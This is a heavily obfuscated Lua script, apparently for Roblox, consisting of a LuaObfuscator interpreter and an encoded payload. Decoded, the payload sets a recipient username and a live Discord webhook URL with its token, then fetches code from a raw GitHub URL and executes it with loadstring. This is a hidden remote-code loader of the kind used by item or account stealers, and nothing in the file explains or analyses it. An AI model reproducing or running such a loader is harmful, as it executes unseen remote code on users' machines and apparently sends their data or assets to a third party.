--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==6) then v29=nil;function v29()local v31=0;local v32;local v33;local v34;local v35;local v36;local v37;local v38;while true do if (v31~=(1800 -(848 + 952))) then else local v78=0 -0 ;while true do if (v78==1) then v31=1 + 0 ;break;end if (v78==(0 -0)) then v32=0;v33=nil;v78=1;end end end if ((1466 -(1052 + 413))==v31) then local v79=227 -(14 + 213) ;while true do if (v79==0) then v34=nil;v35=nil;v79=2 -1 ;end if (v79==(592 -(416 + 175))) then v31=2;break;end end end if (v31~=2) then else local v80=0 -0 ;while true do if (v80~=0) then else v36=nil;v37=nil;v80=686 -(233 + 452) ;end if (v80==1) then v31=3;break;end end end if (v31==3) then v38=nil;while true do local v81=0;while true do if ((0 + 0)==v81) then if (v32~=1) then else v37=v24();v38={};for v103=1 + 0 ,v37 do local v104=0 + 0 ;local v105;local v106;local v107;local v108;while true do if (v104==0) then v105=0;v106=nil;v104=1351 -(70 + 1280) ;end if (v104==(495 -(129 + 364))) then while true do if (v105==1) then v108=nil;while true do if (v106~=0) then else local v144=0;local v145;while true do if (v144==(541 -(208 + 333))) then v145=0 + 0 ;while true do if (v145~=1) then else v106=1 + 0 ;break;end if (v145==0) then local v161=0;local v162;while true do if (v161==(0 -0)) then v162=0 -0 ;while true do if (v162==1) then v145=2 -1 ;break;end if (v162~=0) then else v107=v22();v108=nil;v162=1;end end break;end end end end break;end end end if (v106==(151 -(9 + 141))) then if (v107==(2 -1)) then v108=v22()~=0 ;elseif (v107==2) then v108=v25();elseif (v107==(1 + 2)) then v108=v26();end v38[v103]=v108;break;end end break;end if (v105==(0 + 0)) then local v120=0;local v121;while true do if (v120~=(0 -0)) then else v121=1110 -(625 + 485) ;while true do if (v121==(1 -0)) then v105=1;break;end if (v121~=0) then else local v150=0;while true do if (v150==(1741 -(1250 + 490))) then v121=1777 -(778 + 998) ;break;end if (v150==(0 -0)) then v106=0;v107=nil;v150=3 -2 ;end end end end break;end end end end break;end if (v104==1) then v107=nil;v108=nil;v104=5 -3 ;end end end v36[484 -(11 + 470) ]=v22();v32=5 -3 ;end if (v32~=2) then else local v102=0;while true do if (v102~=(0 + 0)) then else for v111=1,v24() do local v112=0;local v113;local v114;local v115;while true do if (v112==(1 + 0)) then v115=nil;while true do if (v113==1) then while true do if (0~=v114) then else v115=v22();if (v21(v115,1158 -(925 + 232) ,1 + 0 )~=(0 + 0)) then else local v151=0 -0 ;local v152;local v153;local v154;local v155;local v156;while true do if (v151==(401 -(144 + 255))) then v156=nil;while true do if (v152==1) then local v174=0 -0 ;while true do if (v174~=(1 + 0)) then else v152=317 -(47 + 268) ;break;end if (0==v174) then v155=nil;v156=nil;v174=694 -(331 + 362) ;end end end if (v152==(9 -7)) then while true do if (v153~=0) then else local v178=0 -0 ;local v179;local v180;while true do if (1==v178) then while true do if (v179==(0 -0)) then v180=1943 -(1123 + 820) ;while true do if (v180~=(254 -(182 + 72))) then else local v194=0 -0 ;while true do if (v194==(1288 -(564 + 723))) then v180=1 + 0 ;break;end if (v194~=0) then else v154=v21(v115,2,1087 -(723 + 361) );v155=v21(v115,989 -(946 + 39) ,22 -16 );v194=1 + 0 ;end end end if ((62 -(12 + 49))==v180) then v153=1 + 0 ;break;end end break;end end break;end if (v178~=(1118 -(913 + 205))) then else v179=0 + 0 ;v180=nil;v178=1;end end end if (v153==(3 -1)) then local v181=0 + 0 ;local v182;while true do if (v181==(0 + 0)) then v182=0;while true do if (v182==0) then local v193=0;while true do if (v193~=(535 -(103 + 432))) then else if (v21(v155,1,1168 -(1073 + 94) )~=(4 -3)) then else v156[2 + 0 ]=v38[v156[2]];end if (v21(v155,2,4 -2 )~=(1612 -(237 + 1374))) then else v156[263 -(79 + 181) ]=v38[v156[3]];end v193=2 -1 ;end if (v193==1) then v182=1;break;end end end if (v182==1) then v153=1 + 2 ;break;end end break;end end end if (v153==(6 -3)) then if (v21(v155,11 -8 ,29 -(25 + 1) )==(1 + 0)) then v156[4 + 0 ]=v38[v156[5 -1 ]];end v33[v111]=v156;break;end if (v153==1) then local v184=0 -0 ;local v185;local v186;while true do if (v184~=(860 -(53 + 806))) then else while true do if ((0 + 0)==v185) then v186=0;while true do if (v186~=(1 + 0)) then else v153=2 + 0 ;break;end if (v186~=(0 -0)) then else local v195=0;while true do if ((1 -0)~=v195) then else v186=2 -1 ;break;end if (v195~=(489 -(182 + 307))) then else v156={v23(),v23(),nil,nil};if (v154==(1094 -(916 + 178))) then local v200=1290 -(595 + 695) ;local v201;local v202;while true do if (v200==(1861 -(856 + 1004))) then while true do if (v201~=0) then else v202=0 + 0 ;while true do if (v202==(0 -0)) then v156[3]=v23();v156[4]=v23();break;end end break;end end break;end if (v200==0) then v201=0 + 0 ;v202=nil;v200=1111 -(785 + 325) ;end end elseif (v154==(1 + 0)) then v156[2 + 1 ]=v24();elseif (v154==2) then v156[183 -(173 + 7) ]=v24() -(2^16) ;elseif (v154==3) then local v205=0;local v206;local v207;while true do if (v205==0) then v206=308 -(201 + 107) ;v207=nil;v205=1;end if (v205~=(1 + 0)) then else while true do if (v206==(0 -0)) then v207=0 + 0 ;while true do if (v207==(0 + 0)) then v156[7 -4 ]=v24() -(2^16) ;v156[1399 -(549 + 846) ]=v23();break;end end break;end end break;end end end v195=1 + 0 ;end end end end break;end end break;end if (v184==0) then v185=1426 -(720 + 706) ;v186=nil;v184=1;end end end end break;end if (v152==0) then local v175=0 -0 ;while true do if (v175==(1869 -(1284 + 584))) then v152=1;break;end if (v175==0) then v153=0 -0 ;v154=nil;v175=1;end end end end break;end if (1==v151) then v154=nil;v155=nil;v151=2;end if ((1067 -(492 + 575))==v151) then v152=0 -0 ;v153=nil;v151=3 -2 ;end end end break;end end break;end if (v113==0) then local v147=813 -(451 + 362) ;while true do if (v147==(0 + 0)) then v114=0;v115=nil;v147=4 -3 ;end if (v147~=(1 + 0)) then else v113=1031 -(676 + 354) ;break;end end end end break;end if (v112==(973 -(175 + 798))) then local v122=0;while true do if (v122==1) then v112=1207 -(158 + 1048) ;break;end if (v122~=(0 + 0)) then else v113=0 -0 ;v114=nil;v122=1;end end end end end for v116=1,v24() do v34[v116-1 ]=v29();end v102=1;end if (v102==(1 + 0)) then for v118=2 -1 ,v24() do v35[v118]=v24();end return v36;end end end v81=1;end if ((3 -2)==v81) then if (v32==(1514 -(153 + 1361))) then v33={};v34={};v35={};v36={v33,v34,nil,v35};v32=1;end break;end end end break;end end end v30=nil;v18=7;end if (7==v18) then function v30(v39,v40,v41)local v42=v39[1];local v43=v39[2];local v44=v39[3];return function(...)local v66=0;local v67;local v68;local v69;local v70;local v71;while true do if (v66==0) then v67=1;v68= -1;v66=1;end if (v66==2) then v71=nil;function v71()local v83=v42;local v84=v43;local v85=v44;local v86=v28;local v87={};local v88={};local v89={};for v93=666 -(87 + 579) ,v70 do if ((v93>=v85) or ((7102 -5470)>(3404 -(210 + 162)))) then v87[v93-v85 ]=v69[v93 + 1 + 0 ];else v89[v93]=v69[v93 + (145 -((1441 -(929 + 388)) + 20)) ];end end local v90=(v70-v85) + 1 ;local v91;local v92;while true do local v94=0 -0 ;local v95;while true do if ((v94==(0 -0)) or ((625 + 40)>=(1802 + 1874))) then v95=471 -(267 + 204) ;while true do if (((4946 -(219 + 1068))>=(420 + 44)) and (v95==(357 -(202 + 154)))) then if ((v92<=(3 -0)) or ((578 + 287)==(2465 -(297 + 89)))) then if (((1255 + 831 + 890)==(8007 -5031)) and (v92<=(2 -(1 -0)))) then if ((v92==0) or ((138 -88)>(617 + 3041))) then v89[v91[549 -(225 + 322) ]]=v41[v91[2 + 1 ]];else v41[v91[4 -1 ]]=v89[v91[5 -(1 + 2) ]];end elseif ((v92==((2 + 2) -2)) or ((2344 -1526)>(2225 + 483))) then local v127=0 -(0 + 0) ;local v128;local v129;while true do if ((v127==(0 -0)) or ((5532 -3987)>(1231 + 2262))) then local v149=0 + 0 + 0 ;while true do if ((v149==(1897 -(1328 + 568))) or (4048<=(1316 + 2262))) then v127=945 -(174 + 770) ;break;end if (((891 -(163 + 728))==v149) or ((4239 + (41 -25))==(2141 + 1169))) then v128=0 + 0 ;v129=nil;v149=1 + 0 ;end end end if ((v127==(40 -(9 + 30))) or ((6029 -3794)<(2692 -(333 + 950)))) then while true do if ((v128==(0 -0)) or ((5101 -(295 + 951))==1350)) then v129=v91[1 + 1 ];v89[v129]=v89[v129](v13(v89,v129 + (1686 -(1216 + (1839 -1370))) ,v68));break;end end break;end end else do return;end end elseif ((v92<=(11 -6)) or ((1110 -(531 + 4))>(3830 -(528 + 429 + 223)))) then if (((13294 -9190)==(7731 -3627)) and (v92==(1823 -(66 + 1753)))) then local v130=0 -0 ;local v131;local v132;local v133;local v134;local v135;local v136;while true do if ((v130==(3 -0)) or ((2515 -1190)>=(1575 + 2907))) then while true do if (((400 + 3291)>(4085 -(1187 + 154))) and (v131==(0 -0))) then local v159=0 + 0 ;while true do if ((v159==((0 -0) -0)) or ((1349 -1008)>=(5509 -(798 + 237)))) then v132=0 + 0 ;v133=nil;v159=(2 -1) + 0 ;end if ((((334 -244) -37)==(24 + 29)) and (v159==((1 + 0) -0))) then v131=(1241 -867) -(215 + 158) ;break;end end end if (((2740 -(466 + 678))<=(7921 -5134)) and (v131==(825 -(247 + 576)))) then v136=nil;while true do if ((((1626 -866) -507)<=(345 + 1798)) and (v132==(2 -1))) then local v163=0 + 0 ;local v164;while true do if ((v163==(0 -0)) or (647>(62 + 421 + 3133))) then v164=530 -(337 + (1034 -(375 + 466))) ;while true do if ((v164==((326 -216) -(87 + 22))) or ((1966 + 1822)<(1173 -(533 + 140)))) then v132=1 + 0 + 1 ;break;end if (((3111 -(36 + (1672 -(36 + 148))))<(6 + 1505 + 207)) and (v164==(0 + 0))) then v68=(v135 + v133) -(1 + 0) ;v136=0 + 0 ;v164=1 -0 ;end end break;end end end if ((187==(691 -((1927 -(1632 + 98)) + 307))) and (v132==(1067 -(436 + 322 + 309)))) then local v165=0 -0 ;local v166;while true do if (((766 + 2299 + 1236)>(4074 -(492 + 1484))) and (v165==(0 -0))) then v166=0 -0 ;while true do if ((v166==(0 + 0)) or ((22849 -18122)<(1 + 18))) then local v187=0 -0 ;while true do if (((2180 + 820)<(5063 -(751 + 468))) and (v187==(0 + 0))) then v133=v91[2];v134,v135=v86(v89[v133](v13(v89,v133 + 1 + 0 ,v91[3])));v187=1 + 0 ;end if ((v187==(1 -0)) or ((1946 -(73 + 749))>=(3486 -(565 + 437)))) then v166=1045 -(1008 + 36) ;break;end end end if (((5923 -1547)==(13520 -9144)) and (((1216 -329) -(322 + 564))==v166)) then v132=1545 -(383 + 44 + 1117) ;break;end end break;end end end if ((v132==2) or ((2526 -((2713 -(1690 + 14)) + 53))==(2446 -1259))) then for v172=v133,v68 do local v173=0 + 0 ;while true do if ((v173==(546 -((1564 -1149) + 131))) or ((14460 -11076)>=(7404 -(6359 -3212)))) then v136=v136 + 1 + 0 ;v89[v172]=v134[v136];break;end end end break;end end break;end if (((2 -1)==v131) or ((459 -153)>(1201 + 3181))) then v134=nil;v135=nil;v131=4 -(1 + 1) ;end end break;end if ((((4227 -1556) + 1386)==(5498 -1441)) and (v130==1)) then v133=nil;v134=nil;v130=(218 + 396) -((956 -(142 + 309)) + 107) ;end if (((6050 -(548 + 612))>(1351 + 1826)) and (v130==(2 + 0))) then v135=nil;v136=nil;v130=3;end if ((((900 + 232) -(117 + 1015))==v130) or ((11 + 4928)<(1374 + 2113))) then v131=899 -(573 + 326) ;v132=nil;v130=1 + 0 + 0 ;end end else v89[v91[7 -5 ]]=v91[(1266 -(734 + 522)) -7 ];end elseif ((((79 -38) + (2827 -804))>=(226 -(148 + 3))) and (v92<=((1000 -(152 + 831)) -11))) then local v139=0 -0 ;local v140;local v141;local v142;local v143;while true do if (((4016 -2735)<(4388 -1578)) and (v139==(2 -0))) then while true do if (((975 + (7706 -5144))<(4808 -(649 + (956 -(110 + 305))))) and ((453 -(67 + 385))==v140)) then v143=nil;while true do if (((987 -500)<=(5471 -2933)) and (v141==(0 + 0))) then local v167=0 + 0 ;local v168;while true do if (((1827 -(430 + 364))<(2760 -(11 + 158))) and (v167==(0 -0))) then v168=633 -(196 + 437) ;while true do if ((v168==(1436 -(924 + (923 -411)))) or ((1319 -(346 + 12))==(4705 -(377 + 1437)))) then v142=v91[4 -2 ];v143=v89[v91[8 -5 ]];v168=1 + 0 ;end if (((4061 -(14 + 384))>=(819 + 70)) and (v168==(334 -(288 + 45)))) then v141=2 -1 ;break;end end break;end end end if ((v141==(44 -(21 + 22))) or ((401 -(369 -115))==(399 + 116))) then v89[v142 + (965 -(271 + (3229 -2536))) ]=v143;v89[v142]=v143[v91[4 + 0 ]];break;end end break;end if ((v140==(0 + 0)) or ((539 -212)==(3915 -(932 + 66)))) then local v160=0 + 0 ;while true do if ((v160==(1 + 0)) or ((6118 -1270)==(879 -283))) then v140=1195 -(87 + 1107) ;break;end if (((1 + 1421)<=(2060 + 2059)) and (v160==(0 -0))) then v141=1502 -(1192 + 310) ;v142=nil;v160=406 -(311 + (213 -119)) ;end end end end break;end if (((1511 -(351 + 717))<=(3791 -(232 + 498))) and (v139==(0 + 0 + 0))) then v140=0;v141=nil;v139=1062 -(862 + 199) ;end if ((v139==(3 -2)) or ((5171 -(1414 + (2224 -(1385 + 318))))<=(3217 -1533))) then v142=nil;v143=nil;v139=4 -2 ;end end elseif ((v92>(134 -(42 + 85))) or ((10526 -7641)<=(2645 -(145 + 1727)))) then v89[v91[1 + 1 ]]();else v89[v91[1119 -(680 + (1950 -1513)) ]]=v91[15 -((11 -7) + 8) ]~=(0 -0) ;end v67=v67 + 1 + 0 ;break;end if ((v95==(0 -(0 + 0))) or ((665 + 693)<(221 + 152))) then v91=v83[v67];v92=v91[2 -1 ];v95=4 -3 ;end end break;end end end end v66=3;end if (v66==3) then A,B=v28(v11(v71));if  not A[1] then local v96=v39[4][v67] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v66==1) then v69={...};v70=v12("#",...) -1 ;v66=2;end end end;end return v30(v29(),{},v17)(...);end if (1==v18) then v21=nil;function v21(v45,v46,v47)if v47 then local v74=(v45/((968 -(717 + 249))^(v46-(770 -(367 + 402)))))%(((1 -0) + 1)^(((v47-1) -(v46-(1 + 0))) + 1 + (106 -(58 + 48)))) ;return v74-(v74%(1 -0)) ;else local v75=((3 + 0) -1)^(v46-(3 -2)) ;return (((v45%(v75 + v75))>=v75) and (661 -((1623 -1034) + 71))) or (0 + 0) ;end end v22=nil;v18=2;end if (3==v18) then v24=nil;function v24()local v48=0 + 0 + 0 ;local v49;local v50;local v51;local v52;while true do if (v48==1) then return (v52 * (11217606 + 5559610)) + (v51 * (45404 + (21047 -(873 + 42)))) + (v50 * (473 -217)) + v49 ;end if ((0 -0)==v48) then v49,v50,v51,v52=v1(v16,v19,v19 + (7 -4) );v19=v19 + ((1885 -(148 + 1722)) -11) ;v48=1 + 0 ;end end end v25=nil;v18=4;end if (5==v18) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then local v76=0;while true do if (0==v76) then v20=v0(v3(v53,1,1));return "";end end else local v77=v2(v0(v53,16));if v20 then local v82=v5(v77,v20);v20=nil;return v82;else return v77;end end end);v18=1;end if (v18==2) then function v22()local v54=v1(v16,v19,v19);v19=v19 + 1 ;return v54;end v23=nil;function v23()local v55,v56=v1(v16,v19,v19 + (2 -0) );v19=v19 + 1 + 1 ;return (v56 * 256) + v55 ;end v18=3;end if (v18==4) then function v25()local v57=v24();local v58=v24();local v59=2 -1 ;local v60=(v21(v58,1,(2 + 27) -9 ) * (((908 -354) -(79 + 473))^(693 -((2293 -(1148 + 783)) + 299)))) + v57 ;local v61=v21(v58,1564 -(1066 + 477) ,4 + 27 );local v62=((v21(v58,32)==1) and  -(1699 -(481 + (2327 -(115 + 995))))) or (2 -1) ;if (v61==(0 -0)) then if (v60==(1536 -(153 + 1383))) then return v62 * ((2918 -(1253 + 666)) -(372 + 627)) ;else v61=1;v59=0 + 0 ;end elseif (v61==(996 + 1051)) then return ((v60==((667 + 517) -(50 + 1134))) and (v62 * (1/(0 + 0)))) or (v62 * NaN) ;end return v8(v62,v61-(1587 -564) ) * (v59 + (v60/(2^(109 -57)))) ;end v26=nil;function v26(v63)local v64;if  not v63 then v63=v24();if (v63==(0 -0)) then return "";end end v64=v3(v16,v19,(v19 + v63) -(1 -0) );v19=v19 + v63 ;local v65={};for v72=1, #v64 do v65[v72]=v2(v1(v3(v64,v72,v72)));end return v6(v65);end v18=5;end end end v15("LOL!083O0003083O00557365724E616D6503083O004B726D31323O3303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303931383230352O363530393532373134332F78585464464F62652D452D4441624762704533692D663372416C3161444F653847514D514F7172424A584C434E5655587A4F594A6453574E466C565A44525A6F4E5A4547030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E000D3O0012053O00023O0012013O00013O0012053O00043O0012013O00033O00124O00053O00122O000100063O002006000100010007001205000300084O0007000400014O0004000100044O00025O00022O00083O000100012O00033O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
